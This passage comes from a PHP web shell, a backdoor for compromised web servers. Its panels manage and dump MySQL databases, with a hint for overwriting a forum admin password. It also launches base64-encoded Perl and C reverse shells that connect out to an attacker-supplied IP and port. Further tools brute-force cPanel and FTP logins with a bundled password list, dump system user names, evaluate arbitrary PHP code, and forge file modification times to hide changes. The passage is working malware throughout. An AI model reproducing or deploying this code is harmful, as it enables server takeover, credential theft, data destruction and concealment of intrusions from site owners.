910 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
911 if (isset($dbhost)) {
912 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
913 }
914 if (isset($dbuser)) {
915 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
916 }
917 if (isset($dbpass)) {
918 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
919 }
920 if (isset($dbport)) {
921 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
922 }
923 if (isset($dbname)) {
924 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
925 }
926 if (isset($charset)) {
927 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
928 }
929 if ($doing == 'backupmysql' && $saveasfile) {
930 if (!$table) {
931 m('Please choose the table');
932 } else {
933 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
934 $table = array_flip($table);
935 $fp = @fopen($path, 'w');
936 if ($fp) {
937 $result = q('SHOW tables');
938 if (!$result) p('<h2>' . mysql_error() . '</h2>');
939 $mysqldata = '';
940 while ($currow = mysql_fetch_array($result)) {
941 if (isset($table[$currow[0]])) {
942 sqldumptable($currow[0], $fp);
943 }
944 }
945 fclose($fp);
946 $fileurl = str_replace(SA_ROOT, '', $path);
947 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
948 mysql_close();
949 } else {
950 m('Backup failed');
951 }
952 }
953 }
954 if ($insert && $insertsql) {
955 $keystr = $valstr = $tmp = '';
956 foreach ($insertsql as $key => $val) {
957 if ($val) {
958 $keystr.= $tmp . $key;
959 $valstr.= $tmp . "'" . addslashes($val) . "'";
960 $tmp = ',';
961 }
962 }
963 if ($keystr && $valstr) {
964 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
965 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
966 }
967 }
968 if ($update && $insertsql && $base64) {
969 $valstr = $tmp = '';
970 foreach ($insertsql as $key => $val) {
971 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
972 $tmp = ',';
973 }
974 if ($valstr) {
975 $where = base64_decode($base64);
976 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
977 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
978 }
979 }
980 if ($doing == 'del' && $base64) {
981 $where = base64_decode($base64);
982 $delete_sql = "DELETE FROM $tablename WHERE $where";
983 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
984 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
985 }
986 if ($tablename && $doing == 'drop') {
987 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
988 if (q("DROP TABLE $tablename")) {
989 m('Drop table of success');
990 $tablename = '';
991 } else {
992 m(mysql_error());
993 }
994 }
995 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
996 formhead(array('title' => 'MYSQL Manager'));
997 makehide('action', 'sqladmin');
998 p('<p>');
999 p('DBHost:');
1000 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
1001 p(':');
1002 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
1003 p('DBUser:');
1004 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
1005 p('DBPass:');
1006 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
1007 p('DBCharset:');
1008 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
1009 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
1010 p('</p>');
1011 formfoot();
1012?>
1013
1014<script type="text/javascript">
1015
1016function editrecord(action, base64, tablename){
1017
1018 if (action == 'del') {
1019
1020 if (!confirm('Is or isn\'t deletion record?')) return;
1021
1022 }
1023
1024 $('recordlist').doing.value=action;
1025
1026 $('recordlist').base64.value=base64;
1027
1028 $('recordlist').tablename.value=tablename;
1029
1030 $('recordlist').submit();
1031
1032}
1033
1034function moddbname(dbname) {
1035
1036 if(!dbname) return;
1037
1038 $('setdbname').dbname.value=dbname;
1039
1040 $('setdbname').submit();
1041
1042}
1043
1044function settable(tablename,doing,page) {
1045
1046 if(!tablename) return;
1047
1048 if (doing) {
1049
1050 $('settable').doing.value=doing;
1051
1052 }
1053
1054 if (page) {
1055
1056 $('settable').page.value=page;
1057
1058 }
1059
1060 $('settable').tablename.value=tablename;
1061
1062 $('settable').submit();
1063
1064}
1065
1066</script>
1067
1068<?php
1069 formhead(array('name' => 'recordlist'));
1070 makehide('doing');
1071 makehide('action', 'sqladmin');
1072 makehide('base64');
1073 makehide('tablename');
1074 p($dbform);
1075 formfoot();
1076 formhead(array('name' => 'setdbname'));
1077 makehide('action', 'sqladmin');
1078 p($dbform);
1079 if (!$dbname) {
1080 makehide('dbname');
1081 }
1082 formfoot();
1083 formhead(array('name' => 'settable'));
1084 makehide('action', 'sqladmin');
1085 p($dbform);
1086 makehide('tablename');
1087 makehide('page', $page);
1088 makehide('doing');
1089 formfoot();
1090 $cachetables = array();
1091 $pagenum = 30;
1092 $page = intval($page);
1093 if ($page) {
1094 $start_limit = ($page - 1) * $pagenum;
1095 } else {
1096 $start_limit = 0;
1097 $page = 1;
1098 }
1099 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
1100 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
1101 $mysqlver = mysql_get_server_info();
1102 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
1103 $highver = $mysqlver > '4.1' ? 1 : 0;
1104 $query = q("SHOW DATABASES");
1105 $dbs = array();
1106 $dbs[] = '-- Select a database --';
1107 while ($db = mysql_fetch_array($query)) {
1108 $dbs[$db['Database']] = $db['Database'];
1109 }
1110 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
1111 $tabledb = array();
1112 if ($dbname) {
1113 p('<p>');
1114 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
1115 if ($tablename) {
1116 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
1117 }
1118 p('</p>');
1119 mysql_select_db($dbname);
1120 $getnumsql = '';
1121 $runquery = 0;
1122 if ($sql_query) {
1123 $runquery = 1;
1124 }
1125 $allowedit = 0;
1126 if ($tablename && !$sql_query) {
1127 $sql_query = "SELECT * FROM $tablename";
1128 $getnumsql = $sql_query;
1129 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
1130 $allowedit = 1;
1131 }
1132 p('<form action="' . $self . '" method="POST">');
1133 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
1134
1135 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
1136 makehide('tablename', $tablename);
1137 makehide('action', 'sqladmin');
1138 p($dbform);
1139 p('</form>');
1140 if ($tablename || ($runquery && $sql_query)) {
1141 if ($doing == 'structure') {
1142 $result = q("SHOW COLUMNS FROM $tablename");
1143 $rowdb = array();
1144 while ($row = mysql_fetch_array($result)) {
1145 $rowdb[] = $row;
1146 }
1147 p('<table border="0" cellpadding="3" cellspacing="0">');
1148 p('<tr class="head">');
1149 p('<td>Field</td>');
1150 p('<td>Type</td>');
1151 p('<td>Null</td>');
1152 p('<td>Key</td>');
1153 p('<td>Default</td>');
1154 p('<td>Extra</td>');
1155 p('</tr>');
1156 foreach ($rowdb as $row) {
1157 $thisbg = bg();
1158 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1159 p('<td>' . $row['Field'] . '</td>');
1160 p('<td>' . $row['Type'] . '</td>');
1161 p('<td>' . $row['Null'] . ' </td>');
1162 p('<td>' . $row['Key'] . ' </td>');
1163 p('<td>' . $row['Default'] . ' </td>');
1164 p('<td>' . $row['Extra'] . ' </td>');
1165 p('</tr>');
1166 }
1167 tbfoot();
1168 } elseif ($doing == 'insert' || $doing == 'edit') {
1169 $result = q('SHOW COLUMNS FROM ' . $tablename);
1170 while ($row = mysql_fetch_array($result)) {
1171 $rowdb[] = $row;
1172 }
1173 $rs = array();
1174 if ($doing == 'insert') {
1175 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
1176 } else {
1177 p('<h2>Update record in ' . $tablename . ' table »</h2>');
1178 $where = base64_decode($base64);
1179 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1180 $rs = mysql_fetch_array($result);
1181 }
1182 p('<form method="post" action="' . $self . '">');
1183 p($dbform);
1184 makehide('action', 'sqladmin');
1185 makehide('tablename', $tablename);
1186 p('<table border="0" cellpadding="3" cellspacing="0">');
1187 foreach ($rowdb as $row) {
1188 if ($rs[$row['Field']]) {
1189 $value = htmlspecialchars($rs[$row['Field']]);
1190 } else {
1191 $value = '';
1192 }
1193 $thisbg = bg();
1194 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1195 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1196 }
1197 if ($doing == 'insert') {
1198 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1199 } else {
1200 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1201 makehide('base64', $base64);
1202 }
1203 p('</table></form>');
1204 } else {
1205 $querys = @explode(';', $sql_query);
1206 foreach ($querys as $num => $query) {
1207 if ($query) {
1208 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1209 switch (qy($query)) {
1210 case 0:
1211 p('<h2>Error : ' . mysql_error() . '</h2>');
1212 break;
1213 case 1:
1214 if (strtolower(substr($query, 0, 13)) == 'select * from') {
1215 $allowedit = 1;
1216 }
1217 if ($getnumsql) {
1218 $tatol = mysql_num_rows(q($getnumsql));
1219 $multipage = multi($tatol, $pagenum, $page, $tablename);
1220 }
1221 if (!$tablename) {
1222 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1223 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1224 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1225 $tablename = $matches[1][0];
1226 }
1227 $result = q($query);
1228 p($multipage);
1229 p('<table border="0" cellpadding="3" cellspacing="0">');
1230 p('<tr class="head">');
1231 if ($allowedit) p('<td>Action</td>');
1232 $fieldnum = @mysql_num_fields($result);
1233 for ($i = 0;$i < $fieldnum;$i++) {
1234 $name = @mysql_field_name($result, $i);
1235 $type = @mysql_field_type($result, $i);
1236 $len = @mysql_field_len($result, $i);
1237 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1238 }
1239 p('</tr>');
1240 while ($mn = @mysql_fetch_assoc($result)) {
1241 $thisbg = bg();
1242 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1243 $where = $tmp = $b1 = '';
1244 foreach ($mn as $key => $inside) {
1245 if ($inside) {
1246 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1247 $tmp = ' AND ';
1248 }
1249 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
1250 }
1251 $where = base64_encode($where);
1252 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1253 p($b1);
1254 p('</tr>');
1255 unset($b1);
1256 }
1257 tbfoot();
1258 p($multipage);
1259 break;
1260 case 2:
1261 $ar = mysql_affected_rows();
1262 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1263 break;
1264 }
1265 }
1266 }
1267 }
1268 } else {
1269 $query = q("SHOW TABLE STATUS");
1270 $table_num = $table_rows = $data_size = 0;
1271 $tabledb = array();
1272 while ($table = mysql_fetch_array($query)) {
1273 $data_size = $data_size + $table['Data_length'];
1274 $table_rows = $table_rows + $table['Rows'];
1275 $table['Data_length'] = sizecount($table['Data_length']);
1276 $table_num++;
1277 $tabledb[] = $table;
1278 }
1279 $data_size = sizecount($data_size);
1280 unset($table);
1281 p('<table border="0" cellpadding="0" cellspacing="0">');
1282 p('<form action="' . $self . '" method="POST">');
1283 makehide('action', 'sqladmin');
1284 p($dbform);
1285 p('<tr class="head">');
1286 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1287 p('<td>Name</td>');
1288 p('<td>Rows</td>');
1289 p('<td>Data_length</td>');
1290 p('<td>Create_time</td>');
1291 p('<td>Update_time</td>');
1292 if ($highver) {
1293 p('<td>Engine</td>');
1294 p('<td>Collation</td>');
1295 }
1296 p('</tr>');
1297 foreach ($tabledb as $key => $table) {
1298 $thisbg = bg();
1299 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1300 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1301 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1302 p('<td>' . $table['Rows'] . '</td>');
1303 p('<td>' . $table['Data_length'] . '</td>');
1304 p('<td>' . $table['Create_time'] . '</td>');
1305 p('<td>' . $table['Update_time'] . '</td>');
1306 if ($highver) {
1307 p('<td>' . $table['Engine'] . '</td>');
1308 p('<td>' . $table['Collation'] . '</td>');
1309 }
1310 p('</tr>');
1311 }
1312 p('<tr class=fout>');
1313 p('<td> </td>');
1314 p('<td>Total tables: ' . $table_num . '</td>');
1315 p('<td>' . $table_rows . '</td>');
1316 p('<td>' . $data_size . '</td>');
1317 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
1318 p('</tr>');
1319 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "sql.gz\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1320 makehide('doing', 'backupmysql');
1321 formfoot();
1322 p("</table>");
1323 fr($query);
1324 }
1325 }
1326 }
1327 tbfoot();
1328 @mysql_close();
1329} elseif ($action == 'backconnect') {
1330 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1331 !$yourport && $yourport = '12345';
1332 $usedb = array('perl' => 'perl', 'c' => 'c');
1333 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1334 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1335 if ($start && $yourip && $yourport && $use) {
1336 if ($use == 'perl') {
1337 cf('/tmp/angel_bc', $back_connect);
1338 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1339 } else {
1340 cf('/tmp/angel_bc.c', $back_connect_c);
1341 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1342 @unlink('/tmp/angel_bc.c');
1343 $res = execute("/tmp/angel_bc $yourip $yourport &");
1344 }
1345 m("Now script try connect to $yourip port $yourport ...");
1346 }
1347 formhead(array('title' => 'Back Connect'));
1348 makehide('action', 'backconnect');
1349 p('<p>');
1350 p('Your IP:');
1351 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1352 p('Your Port:');
1353 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1354 p('Use:');
1355 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1356 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1357 p('</p>');
1358 formfoot();
1359} elseif ($action == 'brute') {
1360 formhead(array('title' => 'Brute Forcer'));
1361 makehide('action', 'brute');
1362 makehide('dir', $brute);
1363 @ini_set('memory_limit', 1000000000000);
1364 $connect_timeout = 5;
1365 @set_time_limit(0);
1366 $submit = $_REQUEST['submit'];
1367 $users = $_REQUEST['users'];
1368 $pass = $_REQUEST['passwords'];
1369 $target = $_REQUEST['target'];
1370 $option = $_REQUEST['option'];
1371 $passlist = "123pass
1372
1373123!@#
1374
1375123admin
1376
1377123abc
1378
1379123456admin
1380
13811234554321
1382
138312344321
1384
1385pass123
1386
1387admin
1388
1389admincp
1390
1391administrator
1392
1393matkhau
1394
1395passadmin
1396
1397p@ssword
1398
1399password
1400
1401012345
1402
1403123456
1404
14051234567
1406
140712345678
1408
1409123456789
1410
14111234567890
1412
1413111111
1414
1415000000
1416
1417222222
1418
1419333333
1420
1421444444
1422
1423555555
1424
1425666666
1426
1427777777
1428
1429888888
1430
1431999999
1432
1433123123
1434
1435234234
1436
1437345345
1438
1439456456
1440
1441567567
1442
1443678678
1444
1445789789
1446
1447123321
1448
1449456654
1450
1451654321
1452
14537654321
1454
145587654321
1456
1457987654321
1458
14590987654321
1460
1461admin123
1462
1463admin123456
1464
1465abcdef
1466
1467abcabc
1468
1469!@#!@#
1470
1471!@#$%^
1472
1473!@#$%^&*(
1474
1475!@#$$#@!
1476
1477abc123
1478
1479anhyeuem
1480
1481iloveyou
1482
1483admin
1484
1485administrator
1486
1487admincp
1488
1489cpanel
1490
1491adminx
1492
1493admins
1494
1495password
1496
1497passwords
1498
1499passw0rd
1500
1501p@ssw0rd
1502
1503p@ssword
1504
1505khongco
1506
150725251325
1508
1509passw0rds";
1510 if ($target == '') {
1511 $target = 'localhost';
1512 }
1513 print " <div align='center'>
1514
1515<form method='post' style='border: 1px solid #000000'><br><br>
1516
1517<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1518
1519<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1520
1521<div align='center'><br>
1522
1523<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1524
1525<tr>
1526
1527<td align='center'>
1528
1529<b>Username</b></td>
1530
1531<td>
1532
1533<p align='center'>
1534
1535<b>Password</b></td>
1536
1537</tr>
1538
1539</table>
1540
1541<p align='center'>
1542
1543<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1544 $i = 0;
1545 while ($i < 60000) {
1546 $line = posix_getpwuid($i);
1547 if (!empty($line)) {
1548 while (list($key, $vba_etcpwd) = each($line)) {
1549 echo "" . $vba_etcpwd . "\n";
1550 break;
1551 }
1552 }
1553 $i++;
1554 }
1555 echo "
1556
1557</textarea>
1558
1559<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1560
1561<br>
1562
1563<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1564
1565<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1566
1567</td></tr></table></td></tr></form><p align= 'left'>";
1568?>
1569
1570<?php
1571 function ftp_check($host, $user, $pass, $timeout) {
1572 $ch = curl_init();
1573 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1574 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1575 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1576 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1577 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1578 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1579 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1580 $data = curl_exec($ch);
1581 if (curl_errno($ch) == 28) {
1582 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1583 exit;
1584 } elseif (curl_errno($ch) == 0) {
1585 p("<b>[ Leorius@live.com ]# </b>
1586
1587<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1588 }
1589 curl_close($ch);
1590 }
1591 function cpanel_check($host, $user, $pass, $timeout) {
1592 $ch = curl_init();
1593 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1594 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1595 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1596 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1597 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1598 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1599 $data = curl_exec($ch);
1600 if (curl_errno($ch) == 28) {
1601 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1602 exit;
1603 } elseif (curl_errno($ch) == 0) {
1604 p("<b>[ Leorius@live.com ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1605 }
1606 curl_close($ch);
1607 }
1608 if (isset($submit) && !empty($submit)) {
1609 $userlist = explode("\n", $users);
1610 $passlist = explode("\n", $pass);
1611 p('<b>[ Leorius@live.com ]# Attacking ...</font></b><br>');
1612 foreach ($userlist as $user) {
1613 $_user = trim($user);
1614 foreach ($passlist as $password) {
1615 $_pass = trim($password);
1616 if ($option == "ftp") {
1617 ftp_check($target, $_user, $_pass, $connect_timeout);
1618 }
1619 if ($option == "cpanel") {
1620 cpanel_check($target, $_user, $_pass, $connect_timeout);
1621 }
1622 }
1623 }
1624 }
1625 formfoot();
1626} elseif ($action == 'etcpwd') {
1627 formhead(array('title' => 'Get /etc/passwd'));
1628 makehide('action', 'etcpwd');
1629 makehide('dir', $nowpath);
1630 $i = 0;
1631 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1632 while ($i < 60000) {
1633 $line = posix_getpwuid($i);
1634 if (!empty($line)) {
1635 while (list($key, $vba_etcpwd) = each($line)) {
1636 echo "" . $vba_etcpwd . "\n";
1637 break;
1638 }
1639 }
1640 $i++;
1641 }
1642 echo "</textarea></p>";
1643 formfoot();
1644} elseif ($action == 'eval') {
1645 $phpcode = trim($phpcode);
1646 if ($phpcode) {
1647 if (!preg_match('#<\?#si', $phpcode)) {
1648 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1649 }
1650 eval("?" . ">$phpcode<?");
1651 }
1652 formhead(array('title' => 'Eval PHP Code'));
1653 makehide('action', 'eval');
1654 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1655 formfooter();
1656} elseif ($action == 'editfile') {
1657 if (file_exists($opfile)) {
1658 $fp = @fopen($opfile, 'r');
1659 $contents = @fread($fp, filesize($opfile));
1660 @fclose($fp);
1661 $contents = htmlspecialchars($contents);
1662 }
1663 formhead(array('title' => 'Create / Edit File'));
1664 makehide('action', 'file');
1665 makehide('dir', $nowpath);
1666 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1667 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1668 formfooter();
1669} elseif ($action == 'newtime') {
1670 $opfilemtime = @filemtime($opfile);
1671 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1672 formhead(array('title' => 'Clone file was last modified time'));
1673 makehide('action', 'file');
1674 makehide('dir', $nowpath);
1675 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1676 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1677 formfooter();
1678 formhead(array('title' => 'Set last modified'));
1679 makehide('action', 'file');
1680 makehide('dir', $nowpath);
1681 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1682 p('<p>Instead »');
1683 p('year:');
1684 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1685 p('month:');
1686 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1687 p('day:');
1688 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1689 p('hour:');
1690 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1691 p('minute:');
1692 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1693 p('second:');
1694 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1695 p('</p>');
1696 formfooter();
1697} elseif ($action == 'shell') {
1698 if (IS_WIN && IS_COM) {
1699 if ($program && $parameter) {
